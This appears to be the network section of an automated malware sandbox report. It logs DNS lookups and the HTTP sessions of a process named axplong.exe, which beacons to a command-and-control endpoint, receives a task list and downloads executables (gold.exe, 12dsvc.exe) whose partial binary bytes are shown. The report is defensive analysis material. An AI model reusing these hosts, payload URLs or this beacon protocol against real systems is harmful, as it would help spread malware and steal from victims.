Sep 27, 2024 04:21:46.030510902 CEST	1.1.1.1	192.168.2.5	0xbad2	No error (0)	fragnantbui.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:46.030510902 CEST	1.1.1.1	192.168.2.5	0xbad2	No error (0)	fragnantbui.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:47.015515089 CEST	1.1.1.1	192.168.2.5	0x58b0	No error (0)	stogeneratmns.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:47.015515089 CEST	1.1.1.1	192.168.2.5	0x58b0	No error (0)	stogeneratmns.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:48.031424046 CEST	1.1.1.1	192.168.2.5	0x3538	No error (0)	reinforcenh.shop		172.67.208.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:48.031424046 CEST	1.1.1.1	192.168.2.5	0x3538	No error (0)	reinforcenh.shop		104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:48.968296051 CEST	1.1.1.1	192.168.2.5	0xa8ad	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:50.312491894 CEST	1.1.1.1	192.168.2.5	0xe0a	No error (0)	ballotnwu.site		104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:50.312491894 CEST	1.1.1.1	192.168.2.5	0xe0a	No error (0)	ballotnwu.site		172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:00.420838118 CEST	1.1.1.1	192.168.2.5	0x1882	No error (0)	youtube.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:00.421181917 CEST	1.1.1.1	192.168.2.5	0xd137	No error (0)	youtube.com			65	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		216.58.212.174	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406397104 CEST	1.1.1.1	192.168.2.5	0xd529	No error (0)	youtube-ui.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406455040 CEST	1.1.1.1	192.168.2.5	0xfe67	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 27, 2024 04:22:01.406455040 CEST	1.1.1.1	192.168.2.5	0xfe67	No error (0)	youtube-ui.l.google.com			65	IN (0x0001)	false
Sep 27, 2024 04:22:04.907892942 CEST	1.1.1.1	192.168.2.5	0xfd2e	No error (0)	www.google.com			65	IN (0x0001)	false
Sep 27, 2024 04:22:04.907953024 CEST	1.1.1.1	192.168.2.5	0xdbfa	No error (0)	www.google.com		216.58.206.68	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:16.632402897 CEST	1.1.1.1	192.168.2.5	0xfc51	No error (0)	ballotnwu.site		104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:16.632402897 CEST	1.1.1.1	192.168.2.5	0xfc51	No error (0)	ballotnwu.site		172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:33.707178116 CEST	1.1.1.1	192.168.2.5	0x1879	No error (0)	ballotnwu.site		172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:33.707178116 CEST	1.1.1.1	192.168.2.5	0x1879	No error (0)	ballotnwu.site		104.21.2.13	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:02.403605938 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:03.109658957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:03.112271070 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:21:03.372349024 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 65 39 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 63 32 63 64 30 61 34 61 34 65 62 36 63 66 62 66 32 66 36 62 37 30 34 36 65 66 36 65 31 23 31 30 30 30 30 30 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 63 35 36 34 34 66 35 39 63 35 62 36 37 65 64 38 32 31 32 66 38 31 35 64 34 32 65 64 30 66 63 66 38 65 63 33 30 65 61 66 65 62 34 62 36 35 32 36 65 23 31 30 30 30 30 30 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 36 64 62 33 34 62 31 61 38 62 64 65 37 33 31 66 37 62 33 66 66 61 62 34 66 23 31 30 30 30 30 36 36 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 33 30 65 38 66 38 66 62 62 66 34 39 35 34 65 61 65 31 36 30 37 32 [TRUNCATED] Data Ascii: 4e9 <c>1000002001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cfbf2f6b7046ef6e1#1000004001+++aa0ed36554e19fbffc5644f59c5b67ed8212f815d42ed0fcf8ec30eafeb4b6526e#1000005001+++aa0ed36554e19fbffd5744f69c5867ee8214f816db34b1a8bde731f7b3ffab4f#1000066001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730e8f8fbbf4954eae1607267d36ac114d9a16c#1000191001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cf2f8ffb74764e0e17f3d77c77b#1000254001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a733f9f3f3a0046ef6e1#1000290001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cffefe3a35e6eeaaa636b77#1000314001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cd0e8f7be4b48bcb63421208d309642d9#1000322001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a72df9eaf8a6446fe2e1343d77c77b#1000342001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a731efe9e2b7427ee4aa636b77#1000349001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a720fffef9e1046ef6e1#1000354001+++e312d361 [TRUNCATED]
Sep 27, 2024 04:21:03.372363091 CEST	212	IN	Data Raw: 36 66 64 66 30 62 35 61 31 34 62 36 35 65 61 65 62 36 62 33 64 37 37 63 37 37 62 23 31 30 30 30 33 35 35 30 30 31 2b 2b 2b 65 33 31 32 64 33 36 31 31 65 66 34 39 66 61 31 66 34 35 61 35 66 65 61 39 66 35 63 37 63 66 31 38 32 31 36 65 35 30 61 64 Data Ascii: 6fdf0b5a14b65eaeb6b3d77c77b#1000355001+++e312d3611ef49fa1f45a5fea9f5c7cf18216e50adc2bcce2a7e12df9b2e8b2446fe1e928766ada#1000356001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a72df9f2f4fd4f73eb#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	185.215.113.117	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:03.440666914 CEST	53	OUT	GET /inc/gold.exe HTTP/1.1 Host: 185.215.113.117
Sep 27, 2024 04:21:04.166862965 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:04 GMT Content-Type: application/octet-stream Content-Length: 320000 Last-Modified: Wed, 11 Sep 2024 19:08:04 GMT Connection: keep-alive ETag: "66e1ea94-4e200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgf^ @ @`K H.textd `.rsrc@@.reloc @B@Hhp>I=NWS(`}CP?2hl<AICN/uT@$0r"_8)LsYQ%/?L7e&[z*j.8Jsn=O\|ngUDGHKRT1LzF^ly{JB\|`oH3VNf}J/?4nES3ArMqf{!IU/M?>0eXfiUi`wfaLwiVMi4iJps])l0i$\|s+?^(b\|zcbN
Sep 27, 2024 04:21:04.166896105 CEST	1236	IN	Data Raw: 88 b1 dc ef f0 76 b5 64 47 e8 65 a9 a0 5d ee 20 8b ec 22 f8 3c 78 f6 6e d5 01 ce 68 5b a3 59 2f 98 59 39 17 21 3f ef a1 db a2 cc 74 92 35 fb 06 c6 05 c6 83 13 74 92 ec ad ea 79 e5 ff 43 ef 55 2b c3 bd ac aa 7d 05 4a c9 48 a6 4b 12 bb 2c 7a 2e c7 Data Ascii: vdGe] "<xnh[Y/Y9!?t5tyCU+}JHK,z.rP!GG9tAx;2\s]4"MS%0[\\|hY::Uw_5H\|zC+1J/z*Yo37`y9H%CALu=>FTX`Eg(\|D
Sep 27, 2024 04:21:04.166908979 CEST	448	IN	Data Raw: cc 69 eb 75 16 57 37 9d ac b2 c6 b4 79 34 9e b8 42 da a9 ed 8d a2 96 f5 3f 23 e6 22 9d 21 07 e7 e7 bd 87 eb 40 b8 fd f5 e7 dc ad 95 83 0c 43 d9 02 65 ea b6 b9 2a 83 9a af 26 5b 4e 53 56 59 13 3e 25 d8 de 55 94 b7 1f ea 9d 56 1b 8b 52 86 8b 0f a1 Data Ascii: iuW7y4B?#"!@Ce*&[NSVY>%UVRwt1V]bS;,T\|T?p0<7`@8o%AJn&8b.[IrkV6$hXI"o_gXs{IMl$gu+
Sep 27, 2024 04:21:04.166918993 CEST	1236	IN	Data Raw: d1 cf ad 40 2b 57 d9 ae d5 0f 3a 05 a5 d9 7e 15 9f 65 8a b4 5e 16 8f 5c b2 9c 97 2e 35 4f 73 1d 7a 53 bf 72 d0 11 2a e8 78 64 18 c4 ff 01 fb a0 a2 33 e4 eb 5c a4 4d d4 b6 60 26 aa 05 0e bf 86 91 10 fe 93 4d 85 2c 64 30 d8 30 3e 8b 26 91 d0 4b 9c Data Ascii: @+W:~e^\.5OszSr*xd3\M`&M,d00>&KV?>%ym:.BvvS1!C?DU;mJe:Os14AqAYe%Yq)]I3-owZ2F+Jn}4o&Zbcxng`s@UbW!>O#
Sep 27, 2024 04:21:04.166929960 CEST	1236	IN	Data Raw: 73 25 4f 77 6f 02 9f e8 e4 8b d4 d1 ad c9 8e 8d e1 a3 34 b6 63 4f 6d c6 a6 c9 6c 42 2a 38 54 9a 0d ad 3c 51 f8 5f 89 ce 0a 1d d1 90 1e c6 b6 6b 7c ae 43 e7 db 36 49 57 7b b0 0d 67 14 5a ed eb a5 00 f5 b1 6d 9d cc e4 ad 33 5e dd fd 89 ef 22 c9 2b Data Ascii: s%Owo4cOmlB8T<Q_k\|C6IW{gZm3^"+\|/R1$9^<1kpoxQiJxc~Y*"."ti2P)f/$R`HS%Gt1%= ;`y
Sep 27, 2024 04:21:04.166939974 CEST	1236	IN	Data Raw: 36 b3 c9 c3 dd f7 e5 6e 93 61 41 15 0d 17 87 46 3d ec 2e 76 34 e4 86 8e 34 d9 ac 64 9a 81 fe 3a e1 bd c6 50 cc a4 73 b9 d7 3b 2a 5f 59 f4 9d 2f 07 cf 23 17 3e ea f4 6f 98 ea 55 91 7c e7 e3 2a 02 3c 83 f4 9a 10 92 90 da 44 90 6b 5a 00 4a 0c 7e 3e Data Ascii: 6naAF=.v44d:Ps;_Y/#>oU\|<DkZJ~>(gNyqt9Pncn*`~\|$T-sRkhu${CA%#~OpX29Q2yUoqPz(&pXtj%3x6FD&Iy:QcYmvd
Sep 27, 2024 04:21:04.166954041 CEST	1236	IN	Data Raw: 96 fa 49 c0 d4 d9 02 48 f6 09 8f 1b 34 ab 43 2d 65 eb 2a b1 d8 0d ba 2d 65 20 78 ae 91 37 06 45 92 f0 e5 5f b0 1a 5a c4 68 62 0f 60 f1 ca 7d c6 fa c8 ec 74 30 7f 9d 84 b8 a0 2c 5e 42 5f 76 e4 f4 e6 d4 22 b5 c8 a2 97 ef 17 38 35 87 ed a3 a2 1a 2a Data Ascii: IH4C-e-e x7E_Zhb`}t0,^B_v"85NzIy@o4WgwS7n\|aJzNWxr$dP\Ht/3<\;cP0"lp+n{2p-u&5j?}`oQ,8_$6(f8jPEPI
Sep 27, 2024 04:21:04.167032957 CEST	1236	IN	Data Raw: b1 18 e7 46 e8 39 de 69 f4 80 ac 2b b3 17 96 67 aa 3f e8 c9 b8 12 b9 67 53 04 79 60 35 d0 8e 36 e0 a6 b1 ff ee 60 00 61 e5 9f b0 68 76 70 68 19 22 b3 8e a7 b1 fa e9 50 ac 8b 63 be 11 99 4a ca 75 ec e1 2f 5b aa 11 b8 1a cb db ad b2 56 46 66 94 6a Data Ascii: F9i+g?gSy`56`ahvph"PcJu/[VFfj-[#T=j&)#2q\Fw15=UrM8*V:><t9c8geUte_)CuV1BB4q~qRD_WzU
Sep 27, 2024 04:21:04.167046070 CEST	1236	IN	Data Raw: b7 ac cf 71 78 92 c8 b3 b4 52 ef 82 c1 8a e8 47 cb c5 5d 4c 69 8c d7 6e 4c c2 96 48 4b c8 d9 cf 39 3e 9c 31 1b b4 99 44 cc ae 5c 06 e0 ed 40 e2 f8 f9 01 1c 58 6e 29 41 c8 03 88 6d cc 05 df a6 cf 15 ad 8b c7 8b 5b 2a b8 16 4b 4f 8f 07 3c 62 76 11 Data Ascii: qxRG]LinLHK9>1D\@Xn)Am[KO<bvMUF/glHy lK;Q_XmFJW?6\|c[JGDzCUd;m(\|WrWq^_$8qT]dDM7/3xgm
Sep 27, 2024 04:21:04.167057037 CEST	1236	IN	Data Raw: 03 26 df 75 df 2a 59 46 cf d3 e7 63 c6 9f 24 9a ef ad b5 4a bd 9e 98 9b fd 6f 6d f2 57 a2 8b 85 b4 cb dc 31 b1 99 d6 0f f5 a0 20 4e 49 ea 25 05 0b 09 58 3d 41 9e 89 95 e9 e1 82 60 29 31 02 82 54 27 06 d3 f0 54 e5 da 6c d4 f6 90 91 51 f5 7f 53 9a Data Ascii: &uYFc$JomW1 NI%X=A`)1T'TlQShRH&v!.]x6sZX\*H=Z\U<(JSgqQcwMYt:R_bsxO/WkPQ`Z_t"X&'+c[/rN$a
Sep 27, 2024 04:21:04.171957016 CEST	1236	IN	Data Raw: 42 28 40 ea d2 f1 b4 e9 3f cc 33 a0 bc 23 da 56 ad 08 a5 55 74 d6 15 77 72 4f a1 ca 62 fa 01 96 84 90 40 aa 56 c8 58 48 a1 11 b7 33 ce 76 d6 c3 10 86 dc d3 27 75 82 99 0f c8 1d 5d ba 1a c5 08 8c 87 fe 97 be 3c 4a 21 f3 38 5d b5 0f 09 e5 48 d8 c3 Data Ascii: B(@?3#VUtwrOb@VXH3v'u]<J!8]H+%bFLfusjb+3$SRUCX\kH6cY\|G:H}n'53RpG491Yg~6.E_I$F@o\|j/}clM[@MuzEL{V_FK3^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49712	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:05.370484114 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Sep 27, 2024 04:21:06.072520018 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49713	194.116.215.195	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:06.084443092 CEST	51	OUT	GET /12dsvc.exe HTTP/1.1 Host: 194.116.215.195
Sep 27, 2024 04:21:06.704785109 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:06 GMT Content-Type: application/octet-stream Content-Length: 903168 Last-Modified: Wed, 25 Sep 2024 19:30:48 GMT Connection: keep-alive ETag: "66f464e8-dc800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 64 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 be 0d 00 00 08 00 00 00 00 00 00 ee dc 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 dc 0d 00 57 00 00 00 00 e0 0d 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 5c db 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELdf @ `W\ H.text `.rsrc@@.reloc@BHk(Q.GQLqNqr\^vE<@=)!b=qQ..Bc<qi AQE,T~fX3~$)(8trc@i2?-8-:'I`D?/3?WP'XLzb\| 2*\BHg$3p\|+sKZm`wwiVtnLLd`aOT#k0D@d8p{.?Z-\W,(P&`L?ZJ,y:9rYD;S;3{c,Q+bNU/EO[
Sep 27, 2024 04:21:06.704807043 CEST	1236	IN	Data Raw: 86 c1 b6 5b 96 97 57 e7 bf 7f c6 b2 3d ad 19 72 db cc 78 1b 27 b6 9d dd 71 8d 53 22 d3 79 db f7 77 67 0e e3 1e 61 59 f3 a5 c6 8b b3 b0 df 0f 6e 8e 26 5b 45 16 81 1e 85 7a 2d 36 6a 7f 4e 31 23 12 21 0d 96 4a 9f 3c 34 2f 3b c3 68 97 fc da 7a 7f 54 Data Ascii: [W=rx'qS"ywgaYn&[Ez-6jN1#!J<4/;hzT2UL9jE&\|`4/n6hg#yDG*"7Ap;L2:@)'B'Ah6\|?1+tPMdvK}#Wk'q?
Sep 27, 2024 04:21:06.704818964 CEST	1236	IN	Data Raw: f6 ba fb 2c af 09 e5 99 4b 6a 59 0f d0 04 a5 1e b4 ee 6e 03 99 9b 31 55 33 d8 ee 7b 89 72 de 5f 37 4f ce aa 4b cd 9f 7e 31 d4 0d ff bf 26 92 b6 08 78 b0 80 d7 26 89 59 a7 11 3d c3 00 15 9c ec 4e 82 46 d8 5c df ac f9 97 c3 6f 54 95 fd b4 3c a6 9a Data Ascii: ,KjYn1U3{r_7OK~1&x&Y=NF\oT<= i,0V,0Ni&>I/wAG*]RrGi\|C>Q3n#[Mz{tL!/;9Aq(^?P@PfLm60IR&Sr6mM+A
Sep 27, 2024 04:21:06.704832077 CEST	1236	IN	Data Raw: 5a b0 80 bc 0d 3c da 2d 34 16 21 a2 9a f6 46 ba 5c 0a cc b8 87 de 58 cb 10 ba 66 09 db 32 57 e6 42 c3 bc 5c 4a d1 9e 0e d4 20 ef e2 29 ef 3f 15 07 c6 13 41 94 c6 2f ea 0c 34 d5 ac 74 47 d3 6a a6 06 f7 49 58 88 18 d9 e7 87 62 65 c5 bd e2 bb 93 c3 Data Ascii: Z<-4!F\Xf2WB\J )?A/4tGjIXbe,TFH`(33E{^m?-g-;'e&7*n%h&?(y%i~<aqo<I2bD_\|ev^!7VIf$t2rxtK4H
Sep 27, 2024 04:21:06.704844952 CEST	896	IN	Data Raw: 45 10 52 b1 0e 49 de 58 55 54 98 11 e2 cd 1e ae d2 e5 ca 34 6e ef 43 0e b0 bd f3 68 d8 3e 2a 2e b8 ac 0b df c2 e0 08 49 b3 55 70 d0 b6 51 54 c5 02 ec 2f b7 c6 e4 86 6c 65 92 fa 0c d5 c6 34 11 69 5f 1c 1d c4 21 36 5e c0 0e 10 13 59 54 ab c4 17 24 Data Ascii: ERIXUT4nCh>*.IUpQT/le4i_!6^YT$-{I"<=vGy,:^`T@8T_Zqy8we0 jf:q6nRw/6erj3?x7'1!sT6-cwzG{)\ZX(Cy$
Sep 27, 2024 04:21:06.704941988 CEST	1236	IN	Data Raw: 14 5b 0e 2f e5 e7 87 9c 8a b9 07 1e a3 96 b3 05 1b 7d 30 e5 76 b4 02 f5 19 8d 76 24 db 35 59 51 d9 a6 5e ce f8 44 6e 2c b6 da b1 53 a4 2e 14 27 32 18 d2 68 02 65 c4 66 a5 25 db 9b 0d cb 85 0f 37 a6 5d 9a 3b 51 e5 2c b4 85 c2 da a9 4a 35 44 ee 7b Data Ascii: [/}0vv$5YQ^Dn,S.'2hef%7];Q,J5D{vvxuB3:/: 4C#_X(i>z)f\TI,@kE0M/P]$kt$Kc3V[e>(h9V,cds9'!p4YVxbYW<]Rq
Sep 27, 2024 04:21:06.704955101 CEST	1236	IN	Data Raw: c7 fe 8a b9 8d d3 34 98 c5 d4 d9 de 16 06 f2 f8 18 5b ab 57 2a 3a 8a 3f cc a8 1c 62 48 40 56 4a 4e bc 95 68 4a 87 97 ec 4a d1 f6 8b e1 e0 3d 7a d1 06 f2 2c 04 59 2f de 64 f8 d2 d3 da 42 3e 89 24 a7 0f 4e 88 65 8a 1c 9a 4d 15 9a df 3f 10 d6 1e 51 Data Ascii: 4[W:?bH@VJNhJJ=z,Y/dB>$NeM?Q##e>apIh$T #kL]Buc0u+}v=U8D]H4`e>.u!\|rRX:^7Z{&weQHOh8Bok7"gn)yj
Sep 27, 2024 04:21:06.705005884 CEST	448	IN	Data Raw: 94 50 64 c4 fd 90 8d ea 67 30 e0 bc 3b d4 6e 55 07 60 15 ee ab 5d 2e 07 7e e6 64 65 e9 39 ce d0 c6 5c 0d 06 f5 a7 f3 e1 d2 e8 ff eb 76 0b 02 29 89 66 7d 7b d6 5e e1 7a 12 7b 7f 26 58 6d f8 5d 10 65 58 e3 42 cb b1 0e 57 33 c1 07 e8 5d d0 bc d8 32 Data Ascii: Pdg0;nU`].~de9\v)f}{^z{&Xm]eXBW3]2=<Vle0JQgeLq!kOypEm;WAuJ5t`Kldosp5X`%He0#!mf5^p
